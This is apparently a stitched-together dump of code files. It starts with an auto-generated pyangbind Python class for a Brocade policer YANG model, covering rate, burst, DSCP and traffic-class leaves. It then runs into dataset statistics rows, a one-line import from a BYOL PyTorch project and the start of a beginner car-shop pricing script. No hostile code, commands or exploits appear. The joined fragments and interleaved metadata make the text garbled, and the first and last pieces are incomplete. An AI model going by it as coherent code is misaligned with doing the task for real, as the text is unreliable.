            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
        })
    self.__cbs = t
    if hasattr(self, '_set'):
        self._set()
def _unset_cbs(self):
    # Reset cbs to a fresh, valueless instance of its restricted type.
    self.__cbs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_eir(self):
    """
    Getter method for eir, mapped from YANG variable /policy_map/class/police/eir (uint64)
    """
    return self.__eir
def _set_eir(self, v, load=False):
    """
    Setter method for eir, mapped from YANG variable /policy_map/class/police/eir (uint64)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_eir is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_eir() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted range (0..100000000000) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """eir must be of a type compatible with uint64""",
            'defined-type': "uint64",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
        })
    self.__eir = t
    if hasattr(self, '_set'):
        self._set()
def _unset_eir(self):
    # Reset eir to a fresh, valueless instance of its restricted type.
    self.__eir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_ebs(self):
    """
    Getter method for ebs, mapped from YANG variable /policy_map/class/police/ebs (uint64)
    """
    return self.__ebs
def _set_ebs(self, v, load=False):
    """
    Setter method for ebs, mapped from YANG variable /policy_map/class/police/ebs (uint64)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ebs is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ebs() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted range (1250..12500000000) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """ebs must be of a type compatible with uint64""",
            'defined-type': "uint64",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
        })
    self.__ebs = t
    if hasattr(self, '_set'):
        self._set()
def _unset_ebs(self):
    # Reset ebs to a fresh, valueless instance of its restricted type.
    self.__ebs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_set_priority(self):
    """
    Getter method for set_priority, mapped from YANG variable /policy_map/class/police/set_priority (string)
    """
    return self.__set_priority
def _set_set_priority(self, v, load=False):
    """
    Setter method for set_priority, mapped from YANG variable /policy_map/class/police/set_priority (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_set_priority is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_set_priority() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted length (1..64 characters) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """set_priority must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)""",
        })
    self.__set_priority = t
    if hasattr(self, '_set'):
        self._set()
def _unset_set_priority(self):
    # Reset set_priority to a fresh, valueless instance of its restricted type.
    self.__set_priority = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
def _get_conform_set_dscp(self):
    """
    Getter method for conform_set_dscp, mapped from YANG variable /policy_map/class/police/conform_set_dscp (dscp-value)
    """
    return self.__conform_set_dscp
def _set_conform_set_dscp(self, v, load=False):
    """
    Setter method for conform_set_dscp, mapped from YANG variable /policy_map/class/police/conform_set_dscp (dscp-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_conform_set_dscp is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_conform_set_dscp() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted DSCP range (0..63) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """conform_set_dscp must be of a type compatible with dscp-value""",
            'defined-type': "brocade-policer:dscp-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)""",
        })
    self.__conform_set_dscp = t
    if hasattr(self, '_set'):
        self._set()
def _unset_conform_set_dscp(self):
    # Reset conform_set_dscp to a fresh, valueless instance of its restricted type.
    self.__conform_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
def _get_conform_set_prec(self):
    """
    Getter method for conform_set_prec, mapped from YANG variable /policy_map/class/police/conform_set_prec (precedence-value)
    """
    return self.__conform_set_prec
def _set_conform_set_prec(self, v, load=False):
    """
    Setter method for conform_set_prec, mapped from YANG variable /policy_map/class/police/conform_set_prec (precedence-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_conform_set_prec is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_conform_set_prec() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted precedence range (0..7) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """conform_set_prec must be of a type compatible with precedence-value""",
            'defined-type': "brocade-policer:precedence-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)""",
        })
    self.__conform_set_prec = t
    if hasattr(self, '_set'):
        self._set()
def _unset_conform_set_prec(self):
    # Reset conform_set_prec to a fresh, valueless instance of its restricted type.
    self.__conform_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
def _get_conform_set_tc(self):
    """
    Getter method for conform_set_tc, mapped from YANG variable /policy_map/class/police/conform_set_tc (tc-value)
    """
    return self.__conform_set_tc
def _set_conform_set_tc(self, v, load=False):
    """
    Setter method for conform_set_tc, mapped from YANG variable /policy_map/class/police/conform_set_tc (tc-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_conform_set_tc is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_conform_set_tc() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted traffic-class range (0..7) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """conform_set_tc must be of a type compatible with tc-value""",
            'defined-type': "brocade-policer:tc-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)""",
        })
    self.__conform_set_tc = t
    if hasattr(self, '_set'):
        self._set()
def _unset_conform_set_tc(self):
    # Reset conform_set_tc to a fresh, valueless instance of its restricted type.
    self.__conform_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
def _get_exceed_set_dscp(self):
    """
    Getter method for exceed_set_dscp, mapped from YANG variable /policy_map/class/police/exceed_set_dscp (dscp-value)
    """
    return self.__exceed_set_dscp
def _set_exceed_set_dscp(self, v, load=False):
    """
    Setter method for exceed_set_dscp, mapped from YANG variable /policy_map/class/police/exceed_set_dscp (dscp-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_exceed_set_dscp is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_exceed_set_dscp() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted DSCP range (0..63) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """exceed_set_dscp must be of a type compatible with dscp-value""",
            'defined-type': "brocade-policer:dscp-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)""",
        })
    self.__exceed_set_dscp = t
    if hasattr(self, '_set'):
        self._set()
def _unset_exceed_set_dscp(self):
    # Reset exceed_set_dscp to a fresh, valueless instance of its restricted type.
    self.__exceed_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
def _get_exceed_set_prec(self):
    """
    Getter method for exceed_set_prec, mapped from YANG variable /policy_map/class/police/exceed_set_prec (precedence-value)
    """
    return self.__exceed_set_prec
def _set_exceed_set_prec(self, v, load=False):
    """
    Setter method for exceed_set_prec, mapped from YANG variable /policy_map/class/police/exceed_set_prec (precedence-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_exceed_set_prec is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_exceed_set_prec() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted precedence range (0..7) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """exceed_set_prec must be of a type compatible with precedence-value""",
            'defined-type': "brocade-policer:precedence-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)""",
        })
    self.__exceed_set_prec = t
    if hasattr(self, '_set'):
        self._set()
def _unset_exceed_set_prec(self):
    # Reset exceed_set_prec to a fresh, valueless instance of its restricted type.
    self.__exceed_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
def _get_exceed_set_tc(self):
    """
    Getter method for exceed_set_tc, mapped from YANG variable /policy_map/class/police/exceed_set_tc (tc-value)
    """
    return self.__exceed_set_tc
def _set_exceed_set_tc(self, v, load=False):
    """
    Setter method for exceed_set_tc, mapped from YANG variable /policy_map/class/police/exceed_set_tc (tc-value)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_exceed_set_tc is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_exceed_set_tc() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted traffic-class range (0..7) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """exceed_set_tc must be of a type compatible with tc-value""",
            'defined-type': "brocade-policer:tc-value",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)""",
        })
    self.__exceed_set_tc = t
    if hasattr(self, '_set'):
        self._set()
def _unset_exceed_set_tc(self):
    # Reset exceed_set_tc to a fresh, valueless instance of its restricted type.
    self.__exceed_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
# Public attribute access for each YANG leaf: reads go through the generated
# _get_* methods, writes through the validating _set_* methods.
cir = __builtin__.property(_get_cir, _set_cir)
cbs = __builtin__.property(_get_cbs, _set_cbs)
eir = __builtin__.property(_get_eir, _set_eir)
ebs = __builtin__.property(_get_ebs, _set_ebs)
set_priority = __builtin__.property(_get_set_priority, _set_set_priority)
conform_set_dscp = __builtin__.property(_get_conform_set_dscp, _set_conform_set_dscp)
conform_set_prec = __builtin__.property(_get_conform_set_prec, _set_conform_set_prec)
conform_set_tc = __builtin__.property(_get_conform_set_tc, _set_conform_set_tc)
exceed_set_dscp = __builtin__.property(_get_exceed_set_dscp, _set_exceed_set_dscp)
exceed_set_prec = __builtin__.property(_get_exceed_set_prec, _set_exceed_set_prec)
exceed_set_tc = __builtin__.property(_get_exceed_set_tc, _set_exceed_set_tc)
# Registry of this container's leaves, used by the copy-constructor logic above.
_pyangbind_elements = {'cir': cir, 'cbs': cbs, 'eir': eir, 'ebs': ebs, 'set_priority': set_priority, 'conform_set_dscp': conform_set_dscp, 'conform_set_prec': conform_set_prec, 'conform_set_tc': conform_set_tc, 'exceed_set_dscp': exceed_set_dscp, 'exceed_set_prec': exceed_set_prec, 'exceed_set_tc': exceed_set_tc, }
| 90.871036 | 722 | 0.733493 | 6,009 | 42,982 | 5.010318 | 0.035114 | 0.033879 | 0.042781 | 0.045305 | 0.926961 | 0.910386 | 0.896403 | 0.889328 | 0.881622 | 0.87106 | 0 | 0.028686 | 0.112722 | 42,982 | 472 | 723 | 91.063559 | 0.760757 | 0.118422 | 0 | 0.493056 | 0 | 0.038194 | 0.420233 | 0.189696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.027778 | 0 | 0.267361 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
581d7d97f1742c3c13581c06c9c474a82287314f | 43 | py | Python | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 73 | 2020-07-22T10:40:29.000Z | 2022-03-24T11:28:20.000Z | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 11 | 2020-07-26T00:40:09.000Z | 2022-03-23T09:42:46.000Z | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 14 | 2020-08-10T11:51:19.000Z | 2022-02-16T00:53:46.000Z | from .imagenet_loader import ImageNetLoader | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
58826549b21c96bd5e94f9b74bb33ff2bc6238e7 | 35,413 | py | Python | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | #Custom Car Shop
#Daniel Causey
#CIS-120-102-FA18
#Define Variables
totalCost = 0
#Engine Variables
vTwinEngineCost = 200
v4EngineCost = 400
v6EngineCost = 1000
v8EngineCost = 1600
v12EngineCost = 2500
v16EngineCost = 10000
smallElectricMotor = 500
medElectricMotor = 1000
largeElectricMotor = 2000
nuclearReactor = 250000
#Chassis Variables
motorcycle = 1200
sedan = 2000
sports = 4000
sportsUtility = 6000
truck = 10000
luxury = 20000
militaryGrade = 40000
#Paintjob Variables
solid = 200
metallic = 500
pearlescent = 2000
matte = 3000
carbonFiber = 10000
#Interior Variables
fabric = 500
pLeather = 1000
standardLeather = 2500
luxuryLeather = 10000
#Menu Variables
userExit = False
userMenuChoice = 0
userSubMenuChoice = 0
userSubMenuExit = False
userPurchaseMenuChoice = 0
userPurchaseMenuExit = False
engineSelection = False
chassisSelection = False
paintStyleSelected = False
paintColorSelected = False
interiorSelected = False
#Color Array
colors = ["Red", "Orange", "Yellow", "Blue", "Purple", "Green", "Black", "White", "Grey"]
#Receipt Part 1
def printReceipt1():
    """Start a fresh receipt file with a thank-you header.

    Opens receipt.txt in write mode, truncating any receipt left over
    from a previous run.
    """
    # Fix: the original leaked the file handle (never closed); a context
    # manager guarantees the file is flushed and closed.
    with open("receipt.txt", "w") as file:
        file.write("Thank you for your purchase!\n")
#Receipt Part 2
